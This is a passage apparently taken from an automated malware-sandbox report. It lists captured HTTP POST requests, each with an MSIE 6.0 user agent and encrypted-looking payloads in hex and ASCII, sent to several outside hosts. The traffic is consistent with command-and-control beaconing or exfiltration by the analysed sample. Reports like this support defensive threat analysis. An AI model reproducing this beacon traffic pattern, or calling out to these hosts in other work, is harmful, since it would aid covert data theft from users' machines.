64 55 68 68 37 5a 70 44 36 4e 33 37 6d 46 74 79 58 65 62 53 47 51 35 55 6f 6d 46 6b 37 6c 66 38 56 5a 6c 2b 6d 62 44 48 38 4a 75 4f 76 41 54 4e 42 74 47 52 74 64 31 36 62 51 37 45 6d 54 33 66 78 30 4c 45 55 71 63 46 6e 52 6d 4d 4a 6e 6f 58 2b 77 31 79 36 51 61 39 43 45 6f 34 69 73 72 75 6c 2f 74 55 54 41 6c 6e 6c 79 2b 69 31 64 56 54 54 38 77 4f 53 7a 70 36 67 46 34 50 4b 78 49 34 43 70 5a 55 53 44 5a 55 4d 74 64 78 68 39 2b 63 4e 36 61 42 31 71 55 39 33 47 73 76 49 42 4b 53 62 32 54 67 6f 2b 61 46 74 39 42 6d 6e 4e 53 46 48 34 57 43 47 52 38 64 72 44 39 45 4f 70 31 33 42 5a 58 5a 73 2b 4c 66 37 75 70 31 7a 55 75 4c 36 67 68 48 47 4e 56 4d 67 77 65 2f 64 53 31 34 73 62 62 34 4b 4b 71 56 4e 38 78 47 51 56 67 79 38 4a 39 54 34 6c 39 52 49 51 58 64 66 32 6c 54 58 7a 55 56 6a 44 56 70 30 34 4b 35 4e 68 5a 37 2b 45 33 68 57 75 30 44 49 6d 65 62 38 68 77 36 70 31 4e 76 49 37 59 74 57 31 4c 34 4f 4b 32 5a 6a 46 36 4d 66 61 33 4f 52 35 66 43 33 57 56 48 46 65 75 6c 52 35 75 76 34 76 53 4f 74 7a 6a 45 6c 59 5a 73 7a 5a 50 78 43 7a 71 51 35 56 73 67 52 6e 63 59 49 6f 77 34 51 6f 43 71 55 73 75 55 55 72 34 42 67 71 71 39 42 55 74 62 50 45 4a 46 74 37 4d 30 50 67 36 45 46 44 56 53 73 36 6a 59 43 65 51 71 6b 6c 79 65 70 5a 4f 47 72 4b 32 41 70 6c 65 64 62 39 44 39 33 74 6b 70 55 56 67 53 4b 72 41 39 56 30 37 39 4c 64 49 61 76 2b 62 57 50 36 6e 66 49 41 35 57 2f 42 6c 6c 2f 30 6a 5a 35 46 6a 72 68 77 77 6f 65 47 7a 6b 6b 2f 33 56 2f 32 57 Data Ascii: N7KLMY8ancrQ3WQ8Lkb1tpgX2iYlag42M8ODxd0Di3fpFIzjX7OrW3ijtB8p9ZaXOUozH0wIlspba8towQIQyChToocptpf9dxlaS0lamemAh4ncMdUhh7ZpD6N37mFtyXebSGQ5UomFk7lf8VZl+mbDH8JuOvATNBtGRtd16bQ7EmT3fx0LEUqcFnRmMJnoX+w1y6Qa9CEo4isrul/tUTAlnly+i1dVTT8wOSzp6gF4PKxI4CpZUSDZUMtdxh9+cN6aB1qU93GsvIBKSb2Tgo+aFt9BmnNSFH4WCGR8drD9EOp13BZXZs+Lf7up1zUuL6ghHGNVMgwe/dS14sbb4KKqVN8xGQVgy8J9T4l9RIQXdf2lTXzUVjDVp04K5NhZ7+E3hWu0DImeb8hw6p1NvI7YtW1L4OK2ZjF6Mfa3OR5fC3WVHFeulR5uv4vSOtzjElYZszZPxCzqQ5VsgRncYIow4QoCqUsuUUr4Bgqq9BUtbPEJFt7M0Pg6EFDVSs6jYCeQqklyepZOGrK2Apledb9D93tkpUVgSKrA9V079LdIav+bWP6nfIA5W/Bll/0jZ5FjrhwwoeGzkk/3V/2W
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 61 2f 37 75 72 62 54 55 6d 4d 72 52 43 2f 47 71 44 33 69 46 4d 41 64 47 42 61 61 73 6f 32 4e 6f 4b 4a 32 4d 4d 4e 43 51 57 48 4d 45 4d 79 31 5a 75 53 38 61 74 58 7a 75 30 4b 59 58 44 4d 33 44 77 48 36 4d 50 52 7a 4b 4d 62 6e 62 78 65 6b 6f 54 73 45 2b 61 67 37 63 34 75 6d 49 75 2f 6c 44 35 45 56 7a 41 44 48 57 6b 6f 46 57 38 64 2b 38 6a 31 58 52 5a 75 48 50 47 51 73 50 45 43 33 2b 4e 51 38 66 66 75 54 34 75 48 51 34 7a 45 56 4f 37 63 67 6f 54 5a 31 56 65 6f 52 69 43 2b 6a 79 73 37 69 54 6f 6f 36 69 2b 50 63 48 46 55 76 65 73 67 49 64 69 64 69 44 70 36 65 6e 79 69 59 74 43 2f 44 50 48 75 55 71 4f 77 34 66 4c 64 64 63 6f 36 53 63 75 35 79 31 51 70 48 4c 4c 69 6c 50 45 7a 4c 70 75 70 51 39 68 7a 68 59 31 56 39 62 76 58 42 6f 4a 58 54 4f 76 52 30 53 54 4f 78 62 73 43 32 64 34 52 67 50 6a 47 39 4d 75 2b 30 4d 62 4b 69 54 78 63 4d 34 54 70 2b 76 79 34 58 66 49 71 69 35 55 30 66 6f 63 69 4d 66 6c 55 46 52 76 6b 50 62 53 31 61 31 62 46 59 42 4b 2b 46 78 58 6a 34 6d 72 51 53 4a 44 65 6b 6a 32 58 6e 46 31 70 42 47 62 41 6b 65 4a 57 37 6d 64 36 6d 47 79 61 58 4f 37 57 69 48 44 32 45 63 73 61 41 6b 44 53 76 53 46 34 51 55 30 4f 33 65 55 43 39 6a 4c 45 51 4e 36 56 2b 42 59 30 47 73 4a 75 61 30 59 34 30 74 63 36 2f 2f 34 70 4a 59 55 42 46 32 59 5a 48 39 4d 44 4c 69 2b 43 55 44 4e 6b 30 42 68 44 45 2f 6d 34 66 78 4d 47 4f 52 2b 6e 79 41 39 65 37 7a 62 72 43 56 66 70 63 4c 37 45 79 66 78 66 6b 51 2f 6c 37 61 61 31 69 7a 58 48 6b 45 70 79 42 75 51 34 51 64 38 37 50 76 52 76 34 52 63 6f 6d 37 48 74 6e 50 47 39 2b 74 6d 78 47 44 77 42 55 57 63 59 70 54 4a 41 6e 38 72 59 77 64 4e 4e 35 55 77 4e 79 34 52 37 36 33 76 68 30 4f 72 69 78 37 37 39 4c 4f 49 46 62 66 Data Ascii: a/7urbTUmMrRC/GqD3iFMAdGBaaso2NoKJ2MMNCQWHMEMy1ZuS8atXzu0KYXDM3DwH6MPRzKMbnbxekoTsE+ag7c4umIu/lD5EVzADHWkoFW8d+8j1XRZuHPGQsPEC3+NQ8ffuT4uHQ4zEVO7cgoTZ1VeoRiC+jys7iToo6i+PcHFUvesgIdidiDp6enyiYtC/DPHuUqOw4fLddco6Scu5y1QpHLLilPEzLpupQ9hzhY1V9bvXBoJXTOvR0STOxbsC2d4RgPjG9Mu+0MbKiTxcM4Tp+vy4XfIqi5U0fociMflUFRvkPbS1a1bFYBK+FxXj4mrQSJDekj2XnF1pBGbAkeJW7md6mGyaXO7WiHD2EcsaAkDSvSF4QU0O3eUC9jLEQN6V+BY0GsJua0Y40tc6//4pJYUBF2YZH9MDLi+CUDNk0BhDE/m4fxMGOR+nyA9e7zbrCVfpcL7EyfxfkQ/l7aa1izXHkEpyBuQ4Qd87PvRv4Rcom7HtnPG9+tmxGDwBUWcYpTJAn8rYwdNN5UwNy4R763vh0Orix779LOIFbf
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 33 54 4f 38 5a 6f 53 45 6c 73 72 38 6b 6f 71 64 6e 30 62 45 62 31 63 57 4c 66 57 38 56 7a 6d 69 2b 4e 6b 78 67 73 62 36 6f 44 58 4e 51 52 36 6e 64 50 70 79 48 49 51 45 2b 4b 64 6f 6a 4f 78 75 62 34 63 44 63 2f 52 64 4c 41 53 4b 55 30 49 78 78 4e 45 48 66 73 58 57 48 4e 41 37 41 7a 6a 34 72 66 37 4e 62 4b 76 45 50 4d 32 46 77 35 62 5a 2f 4f 4d 37 66 70 64 42 46 72 69 71 4d 76 44 31 62 73 63 36 6f 31 45 37 41 4c 63 55 73 42 7a 72 4e 6b 59 58 66 31 56 48 70 44 62 4e 66 42 78 4c 7a 42 67 66 4c 39 36 35 43 53 69 46 56 78 6e 6f 6f 52 38 43 35 70 56 58 53 46 57 6e 63 31 6e 50 69 67 72 33 4f 76 6f 45 31 70 4e 73 35 59 49 4d 42 36 71 73 4b 6c 6c 46 76 77 66 50 4c 36 59 41 42 78 49 49 42 32 55 75 49 7a 38 38 7a 4b 43 68 71 2f 6f 49 6e 49 76 30 72 4f 6a 53 36 74 39 59 74 34 69 4a 71 72 7a 4a 6b 75 79 33 33 49 30 42 6f 62 6e 6c 5a 33 35 4f 36 2f 31 76 31 70 35 35 33 31 37 31 37 30 37 75 31 32 34 72 56 68 36 56 54 56 6c 74 69 6e 35 4b 58 4a 48 73 30 4a 76 47 56 4a 69 6f 6a 31 74 7a 41 75 31 72 4e 70 45 76 4c 52 6d 77 67 63 61 52 6a 57 62 51 6e 2b 48 41 4d 37 32 4f 4a 7a 67 54 4e 39 6b 57 57 4b 63 36 64 66 6a 39 5a 4f 65 42 65 35 62 6d 2b 62 7a 6c 73 53 30 72 34 46 41 44 49 66 65 6e 78 36 55 4d 64 7a 34 41 67 79 65 54 6c 77 6b 58 6a 32 73 65 78 71 39 65 37 43 50 4e 69 6c 65 38 65 6f 39 63 33 47 63 33 51 78 51 43 62 7a 36 51 77 6f 67 75 43 6f 73 71 39 7a 45 42 6d 31 59 52 63 38 36 6d 55 4a 7a 33 39 49 31 75 79 45 6a 70 6c 4d 4e 6f 56 35 46 6e 57 58 77 6e 68 44 55 31 41 66 32 2b 62 71 4e 42 50 41 69 35 42 4b 4a 6e 57 68 49 41 6c 46 32 67 54 31 72 56 66 35 64 74 6d 30 6e 39 6b 2b 61 78 48 57 55 69 6c 50 43 64 79 50 35 47 4b 54 6f 2b 77 52 75 75 5a 75 52 50 70 2f 4b 33 2f 36 77 45 4d 62 56 6b 2b 41 43 50 6c 51 3d 3d Data Ascii: 3TO8ZoSElsr8koqdn0bEb1cWLfW8Vzmi+Nkxgsb6oDXNQR6ndPpyHIQE+KdojOxub4cDc/RdLASKU0IxxNEHfsXWHNA7Azj4rf7NbKvEPM2Fw5bZ/OM7fpdBFriqMvD1bsc6o1E7ALcUsBzrNkYXf1VHpDbNfBxLzBgfL965CSiFVxnooR8C5pVXSFWnc1nPigr3OvoE1pNs5YIMB6qsKllFvwfPL6YABxIIB2UuIz88zKChq/oInIv0rOjS6t9Yt4iJqrzJkuy33I0BobnlZ35O6/1v1p553171707u124rVh6VTVltin5KXJHs0JvGVJioj1tzAu1rNpEvLRmwgcaRjWbQn+HAM72OJzgTN9kWWKc6dfj9ZOeBe5bm+bzlsS0r4FADIfenx6UMdz4AgyeTlwkXj2sexq9e7CPNile8eo9c3Gc3QxQCbz6QwoguCosq9zEBm1YRc86mUJz39I1uyEjplMNoV5FnWXwnhDU1Af2+bqNBPAi5BKJnWhIAlF2gT1rVf5dtm0n9k+axHWUilPCdyP5GKTo+wRuuZuRPp/K3/6wEMbVk+ACPlQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 54 57 62 6b 4d 31 6b 39 68 4d 71 49 57 5a 53 31 61 49 5a 49 4d 2f 4b 6d 49 4f 6d 33 54 59 73 77 6e 63 56 4d 30 32 56 53 73 67 6a 6d 4a 50 38 79 39 51 75 66 64 6b 42 68 78 44 6d 38 53 7a 6c 62 39 59 65 5a 41 4b 73 63 56 66 32 45 55 76 42 55 48 6f 57 74 72 77 33 6a 5a 32 70 52 75 65 64 33 58 35 35 4b 4c 32 4a 66 4e 43 4a 50 62 64 46 32 67 33 4a 78 66 63 72 67 45 38 64 68 76 6b 74 66 54 78 7a 68 5a 30 55 67 47 65 58 71 78 70 2f 57 41 5a 32 59 6a 4f 4d 70 46 43 6b 61 52 62 36 6f 4b 34 45 6d 44 67 50 72 38 31 58 39 30 77 4f 47 42 54 69 38 53 48 64 58 53 2f 63 56 79 7a 32 36 64 79 37 34 6d 55 74 79 31 59 64 42 61 63 79 71 47 54 56 35 4a 34 79 70 55 36 79 75 57 50 73 4a 63 61 4b 6c 73 54 49 4c 6b 51 57 49 5a 79 58 6c 6e 71 65 73 48 4c 42 33 70 30 73 33 72 44 36 71 76 71 78 71 58 73 61 57 59 63 35 73 73 75 56 51 56 43 69 51 4e 64 72 44 6e 74 54 73 6a 64 66 66 73 44 2f 4a 72 68 41 4f 71 53 6e 46 68 69 65 6e 43 33 43 68 4c 39 73 4a 39 57 4a 4e 6b 41 6a 4c 38 2b 2f 2f 75 54 74 4a 68 62 78 39 53 64 71 73 66 44 51 30 43 4a 51 54 68 66 59 55 6e 38 59 45 52 4b 39 6e 31 68 74 65 63 53 55 36 4c 51 53 68 43 64 48 4f 4f 64 69 65 42 43 36 39 50 34 30 73 64 42 59 75 68 32 32 7a 37 67 35 73 58 6e 4b 2f 30 54 64 57 43 6d 30 36 6f 6a 37 72 43 70 50 45 58 30 6f 79 6d 4d 52 67 73 48 61 2f 34 59 77 39 4d 74 56 4a 5a 64 4b 6d 64 65 54 77 33 72 2f 74 79 4a 52 69 54 56 72 6e 64 73 6a 4c 4a 38 63 70 4e 72 67 70 4c 2f 72 65 34 52 6f 53 59 6a 44 61 55 43 44 77 6b 46 64 4e 74 56 66 75 32 79 61 69 53 30 46 36 64 51 6a 48 73 57 37 50 7a 36 51 73 72 4b 37 53 48 52 4c 63 54 37 34 6e 67 7a 57 37 55 68 5a 30 53 77 75 46 4d 62 50 48 59 41 3d 3d Data Ascii: TWbkM1k9hMqIWZS1aIZIM/KmIOm3TYswncVM02VSsgjmJP8y9QufdkBhxDm8Szlb9YeZAKscVf2EUvBUHoWtrw3jZ2pRued3X55KL2JfNCJPbdF2g3JxfcrgE8dhvktfTxzhZ0UgGeXqxp/WAZ2YjOMpFCkaRb6oK4EmDgPr81X90wOGBTi8SHdXS/cVyz26dy74mUty1YdBacyqGTV5J4ypU6yuWPsJcaKlsTILkQWIZyXlnqesHLB3p0s3rD6qvqxqXsaWYc5ssuVQVCiQNdrDntTsjdffsD/JrhAOqSnFhienC3ChL9sJ9WJNkAjL8+//uTtJhbx9SdqsfDQ0CJQThfYUn8YERK9n1htecSU6LQShCdHOOdieBC69P40sdBYuh22z7g5sXnK/0TdWCm06oj7rCpPEX0oymMRgsHa/4Yw9MtVJZdKmdeTw3r/tyJRiTVrndsjLJ8cpNrgpL/re4RoSYjDaUCDwkFdNtVfu2yaiS0F6dQjHsW7Pz6QsrK7SHRLcT74ngzW7UhZ0SwuFMbPHYA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 50 4d 4c 34 65 76 31 38 6e 38 72 35 68 6e 30 76 74 42 6f 4b 52 7a 61 61 33 47 30 72 38 4b 65 53 67 63 32 73 55 56 72 41 69 62 62 7a 55 30 74 6f 36 45 37 47 79 61 69 4c 55 69 33 44 55 42 66 52 45 30 56 56 65 33 71 38 77 68 6f 35 77 45 50 6b 66 61 50 72 47 51 65 35 61 2b 4d 49 58 41 55 6c 35 48 2b 4c 41 48 2f 44 4e 6c 30 58 78 46 69 39 41 4e 30 67 4f 53 56 74 4d 6b 65 35 77 78 6f 73 49 44 43 43 2f 52 55 4f 57 6e 35 64 57 37 32 46 71 37 4e 4a 50 64 2f 75 65 39 75 76 65 6c 61 53 4d 4c 5a 57 32 56 4e 32 51 61 65 6d 42 69 56 45 45 43 30 32 52 72 38 51 58 6a 47 43 38 5a 6b 50 6c 71 49 68 65 67 44 79 55 37 61 36 6d 32 6b 39 6f 54 79 74 4f 39 59 79 33 65 51 6b 53 77 75 56 71 4a 79 42 65 57 66 4e 5a 79 39 2f 32 4d 4c 62 33 69 69 77 33 78 44 42 38 4f 50 54 49 36 4e 53 7a 6e 75 51 64 2b 31 75 44 56 62 2b 4c 37 51 42 4e 55 41 39 38 58 7a 5a 66 4b 7a 72 6b 4a 68 44 77 67 49 6f 38 32 6e 6c 52 72 49 71 2f 77 62 4f 53 4d 5a 31 64 38 78 44 4e 4d 2b 33 75 59 70 71 62 7a 6f 52 6a 5a 41 6c 70 2f 2b 2b 64 73 6d 46 73 4e 69 5a 65 64 4b 6c 73 41 35 79 37 41 45 48 4c 5a 75 64 49 77 50 4d 73 45 42 70 51 5a 73 2b 68 53 77 5a 35 53 36 4d 5a 37 74 76 31 6c 5a 72 59 75 37 59 52 57 46 47 5a 7a 37 65 66 77 66 50 55 4e 6a 38 30 35 6e 45 43 4a 55 64 51 34 39 39 2f 68 72 35 6d 5a 78 75 73 57 4e 6e 65 74 6a 47 33 6d 49 54 75 48 4a 4c 46 64 39 31 67 4f 69 62 38 46 78 4c 51 36 49 61 67 61 6a 4c 32 75 61 46 34 44 4c 32 52 47 30 2f 33 6b 6e 44 4c 6d 77 2f 62 73 6e 71 65 30 42 59 6c 54 4f 71 71 2f 61 79 7a 45 46 63 55 67 77 4c 75 6b 37 34 56 56 62 49 6b 78 6b 34 55 78 4e 4e 6a 66 7a 73 51 7a 6e 51 47 36 2b 57 5a 42 61 59 42 55 37 62 6d 33 7a 41 6b 68 5a 49 32 50 68 37 54 44 69 62 2f 79 50 52 6a 50 30 68 74 62 5a 4e 43 7a 50 4d 33 61 43 32 6f 50 52 37 73 4d 68 5a 78 79 73 3d Data Ascii: PML4ev18n8r5hn0vtBoKRzaa3G0r8KeSgc2sUVrAibbzU0to6E7GyaiLUi3DUBfRE0VVe3q8who5wEPkfaPrGQe5a+MIXAUl5H+LAH/DNl0XxFi9AN0gOSVtMke5wxosIDCC/RUOWn5dW72Fq7NJPd/ue9uvelaSMLZW2VN2QaemBiVEEC02Rr8QXjGC8ZkPlqIhegDyU7a6m2k9oTytO9Yy3eQkSwuVqJyBeWfNZy9/2MLb3iiw3xDB8OPTI6NSznuQd+1uDVb+L7QBNUA98XzZfKzrkJhDwgIo82nlRrIq/wbOSMZ1d8xDNM+3uYpqbzoRjZAlp/++dsmFsNiZedKlsA5y7AEHLZudIwPMsEBpQZs+hSwZ5S6MZ7tv1lZrYu7YRWFGZz7efwfPUNj805nECJUdQ499/hr5mZxusWNnetjG3mITuHJLFd91gOib8FxLQ6IagajL2uaF4DL2RG0/3knDLmw/bsnqe0BYlTOqq/ayzEFcUgwLuk74VVbIkxk4UxNNjfzsQznQG6+WZBaYBU7bm3zAkhZI2Ph7TDib/yPRjP0htbZNCzPM3aC2oPR7sMhZxys=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 35 6f 68 79 5a 50 6b 52 70 38 70 45 76 68 51 67 69 42 4e 6c 32 5a 4b 41 69 47 66 58 54 72 2b 69 50 5a 53 44 64 43 49 50 74 39 62 6a 37 4f 62 34 4b 72 2f 62 30 43 46 61 4f 58 49 6c 33 64 39 47 73 41 78 74 44 67 6c 36 46 41 36 54 76 78 71 2f 57 4c 54 73 73 66 41 4f 65 69 55 74 6d 46 52 31 6a 31 71 53 33 68 6b 4a 72 62 6d 75 66 53 72 53 74 4e 43 45 44 71 62 66 42 74 4a 4b 59 4e 30 6c 73 43 6f 71 56 69 76 61 49 73 31 46 72 44 32 73 79 72 35 73 6f 73 4f 43 30 47 62 6c 61 4c 6e 58 75 75 47 41 76 2f 30 50 50 73 35 4a 64 47 44 74 62 6a 71 33 7a 47 31 6d 6f 63 42 67 73 4f 55 44 34 67 4f 54 49 30 69 42 2f 67 42 34 69 4d 4c 72 68 65 58 44 78 58 55 78 54 54 6f 53 45 46 48 30 67 42 42 37 74 44 6c 2f 56 64 79 4c 68 33 6c 6e 58 76 6b 2f 78 67 2f 65 73 48 62 47 55 73 38 6d 43 4e 33 68 4e 5a 33 77 4e 46 55 4d 52 6e 45 4d 45 56 6e 58 2b 4a 4e 54 35 4f 34 4e 30 66 58 44 75 32 52 55 2b 59 6d 2f 56 71 46 4e 52 74 2b 64 7a 55 4e 6f 62 35 37 56 6f 52 79 4f 5a 65 65 62 55 68 43 70 56 31 43 30 75 78 6d 37 71 59 61 32 54 31 69 78 32 30 2f 36 48 78 2f 32 74 61 55 67 4e 52 30 6c 61 70 77 48 39 62 67 53 4f 63 49 77 39 59 66 6f 4a 34 57 74 72 30 69 44 31 32 42 63 54 49 78 47 4f 4e 2f 76 4d 6c 78 79 6b 4e 4d 57 4a 56 44 33 50 49 49 72 32 36 50 35 55 48 6e 52 73 57 71 77 31 58 42 67 75 37 4b 35 30 63 36 71 48 4f 67 48 50 70 44 44 51 6d 4e 54 71 32 4d 70 54 63 43 36 48 70 47 4d 72 62 4f 35 4a 68 4c 7a 45 6e 73 66 78 36 63 70 36 50 34 46 33 44 7a 2b 38 76 43 71 4d 7a 6e 62 45 6b 4c 51 51 71 5a 31 4f 37 48 43 74 70 49 63 54 50 4c 55 66 61 63 68 6b 68 39 5a 62 50 5a 47 75 70 43 69 4c 56 47 62 4c 64 33 57 76 50 67 36 56 57 55 76 66 61 66 44 46 76 54 7a 57 66 4d 3d Data Ascii: 5ohyZPkRp8pEvhQgiBNl2ZKAiGfXTr+iPZSDdCIPt9bj7Ob4Kr/b0CFaOXIl3d9GsAxtDgl6FA6Tvxq/WLTssfAOeiUtmFR1j1qS3hkJrbmufSrStNCEDqbfBtJKYN0lsCoqVivaIs1FrD2syr5sosOC0GblaLnXuuGAv/0PPs5JdGDtbjq3zG1mocBgsOUD4gOTI0iB/gB4iMLrheXDxXUxTToSEFH0gBB7tDl/VdyLh3lnXvk/xg/esHbGUs8mCN3hNZ3wNFUMRnEMEVnX+JNT5O4N0fXDu2RU+Ym/VqFNRt+dzUNob57VoRyOZeebUhCpV1C0uxm7qYa2T1ix20/6Hx/2taUgNR0lapwH9bgSOcIw9YfoJ4Wtr0iD12BcTIxGON/vMlxykNMWJVD3PIIr26P5UHnRsWqw1XBgu7K50c6qHOgHPpDDQmNTq2MpTcC6HpGMrbO5JhLzEnsfx6cp6P4F3Dz+8vCqMznbEkLQQqZ1O7HCtpIcTPLUfachkh9ZbPZGupCiLVGbLd3WvPg6VWUvfafDFvTzWfM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 79 4b 4b 47 59 47 48 78 70 73 70 5a 63 32 63 48 77 4e 75 4f 6e 54 70 63 66 4a 4a 66 56 67 35 75 4a 54 59 76 6c 34 44 51 69 75 64 41 4b 67 62 53 46 39 53 56 68 65 45 72 36 6b 50 46 43 70 4c 4f 6e 53 57 51 36 58 73 66 4f 32 43 31 55 6e 37 55 73 44 63 67 79 52 37 6f 64 43 41 30 48 4f 69 64 62 76 41 72 65 6f 35 77 38 45 79 6e 32 63 76 49 6f 76 42 52 6b 39 79 2b 48 73 6d 4f 42 39 64 74 63 52 62 63 6f 65 4c 61 6e 2b 52 56 73 61 4a 6a 44 74 51 6b 45 64 6b 72 6e 7a 39 62 4b 77 67 51 4f 56 4f 69 71 53 50 7a 67 50 62 73 74 50 76 6f 35 42 36 50 64 55 41 36 32 36 41 4f 2b 75 56 46 32 71 4a 34 34 52 52 36 4a 6d 6d 57 44 50 43 53 62 34 56 35 72 63 71 41 56 48 2f 4d 64 41 48 59 49 70 30 49 39 6b 4a 73 49 30 6b 64 45 47 4c 53 6f 6f 42 66 38 4f 5a 78 37 68 76 53 76 49 72 69 52 71 4e 2b 58 70 77 55 2b 2b 66 67 56 70 32 62 6a 42 39 67 54 52 4f 6a 58 30 54 49 65 36 5a 41 4d 6b 78 54 6b 67 44 48 5a 36 43 48 50 53 6d 34 58 67 76 35 79 4a 33 39 38 65 6b 4a 6b 59 52 32 46 42 4e 30 2f 30 77 53 34 6f 66 46 33 63 6c 37 6d 5a 2f 75 74 7a 45 6a 79 68 66 54 44 41 53 6f 55 64 52 56 6a 6d 59 70 6b 44 63 6a 52 51 6c 41 75 2f 67 74 35 62 52 55 61 30 51 79 42 4b 33 74 69 62 4f 55 52 5a 6f 79 30 66 48 48 33 78 73 7a 64 67 45 43 31 72 6d 61 62 6b 6e 45 2b 52 43 4b 53 34 44 44 54 6a 4d 5a 2b 74 67 55 45 75 72 61 4c 75 4e 70 74 43 5a 71 67 5a 36 4c 37 57 75 69 79 6d 46 73 57 6f 45 4f 71 63 7a 30 55 2b 63 35 68 50 65 6e 35 4f 62 37 64 72 5a 74 43 57 6d 5a 6c 73 64 69 33 38 36 6d 4b 32 6e 43 7a 42 72 30 2b 37 46 36 78 4d 4a 36 75 4b 55 35 56 49 6a 42 32 44 39 56 6a 47 34 45 38 79 6f 67 79 48 4f 52 6d 5a 65 70 45 72 6d 31 6b 31 76 48 46 73 6a 42 78 71 7a 5a 69 55 73 3d Data Ascii: yKKGYGHxpspZc2cHwNuOnTpcfJJfVg5uJTYvl4DQiudAKgbSF9SVheEr6kPFCpLOnSWQ6XsfO2C1Un7UsDcgyR7odCA0HOidbvAreo5w8Eyn2cvIovBRk9y+HsmOB9dtcRbcoeLan+RVsaJjDtQkEdkrnz9bKwgQOVOiqSPzgPbstPvo5B6PdUA626AO+uVF2qJ44RR6JmmWDPCSb4V5rcqAVH/MdAHYIp0I9kJsI0kdEGLSooBf8OZx7hvSvIriRqN+XpwU++fgVp2bjB9gTROjX0TIe6ZAMkxTkgDHZ6CHPSm4Xgv5yJ398ekJkYR2FBN0/0wS4ofF3cl7mZ/utzEjyhfTDASoUdRVjmYpkDcjRQlAu/gt5bRUa0QyBK3tibOURZoy0fHH3xszdgEC1rmabknE+RCKS4DDTjMZ+tgUEuraLuNptCZqgZ6L7WuiymFsWoEOqcz0U+c5hPen5Ob7drZtCWmZlsdi386mK2nCzBr0+7F6xMJ6uKU5VIjB2D9VjG4E8yogyHORmZepErm1k1vHFsjBxqzZiUs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 52 55 44 57 5a 44 55 56 70 38 72 34 70 43 56 31 6e 43 57 4c 4b 79 34 33 31 49 48 44 43 50 32 53 4f 59 33 4d 47 6b 4f 67 6c 56 51 57 53 45 37 5a 4a 37 76 64 57 51 35 2b 36 43 6b 76 46 55 71 70 38 42 2b 45 31 56 74 49 4f 2b 46 4f 52 4f 53 7a 7a 48 54 54 78 68 4f 4e 6d 57 70 48 75 71 37 59 58 73 75 79 4c 63 72 31 6e 61 71 68 52 38 64 69 2f 45 62 47 51 33 47 70 39 6c 54 37 30 43 53 4a 52 52 4b 54 6d 33 79 46 34 76 4e 6f 54 59 6d 51 66 73 6d 42 74 44 54 74 4f 2b 31 42 79 41 33 6c 2b 74 44 2b 66 43 75 77 58 43 66 79 32 6f 65 79 4e 41 4a 65 49 77 63 55 64 53 63 32 55 6f 4b 6a 35 4e 62 69 49 38 54 44 50 6b 31 56 55 53 2b 30 79 73 63 64 31 63 5a 50 61 63 42 37 6d 6d 51 42 4d 2f 52 4d 6a 6c 54 77 4e 62 33 49 68 67 75 61 38 6a 4e 32 56 49 56 4a 67 70 47 78 43 49 51 54 4b 33 35 4c 55 63 62 6e 52 72 32 35 77 43 4d 77 30 35 74 6c 42 67 47 70 45 73 31 50 57 47 4a 45 50 63 64 72 65 42 42 5a 38 76 70 45 66 49 36 36 36 77 53 4c 4e 48 32 69 2b 54 50 31 49 6a 42 37 35 62 45 31 54 54 39 78 73 61 71 44 4d 70 4c 55 4e 73 61 79 6c 35 58 54 50 2f 44 35 36 50 53 30 34 50 5a 61 72 4d 4f 34 31 43 59 35 70 47 42 62 4f 74 6d 71 67 65 62 70 74 52 65 62 35 30 32 73 59 41 46 74 49 6b 67 35 7a 66 2b 74 73 46 32 4b 6e 4b 4a 57 2f 54 33 39 55 6f 42 68 48 70 6d 7a 6b 58 76 66 64 7a 59 6f 37 6a 4a 79 71 71 4d 52 2f 35 44 4d 44 78 2f 65 61 41 4e 6b 6e 4b 45 38 75 53 68 30 66 4a 76 6f 5a 2f 6d 4b 6f 4f 66 4b 33 77 38 39 4b 52 51 47 6c 6e 6c 31 2f 4d 75 4a 36 74 33 65 6d 31 41 62 4e 48 62 67 45 37 79 6d 50 38 33 54 48 58 62 6f 34 73 58 62 69 4c 66 52 33 30 62 49 53 43 31 51 36 43 54 54 4b 6e 73 7a 4a 41 65 36 38 69 61 77 71 77 39 44 6b 58 56 35 52 65 56 65 65 4b 62 45 4a 5a 2f 68 6e 6c 32 67 51 47 69 6e 38 55 6a 78 57 47 37 59 42 34 4d 76 5a 39 62 62 5a 79 79 6f 54 67 47 2f 38 32 38 72 56 36 76 37 44 41 3d 3d Data Ascii: 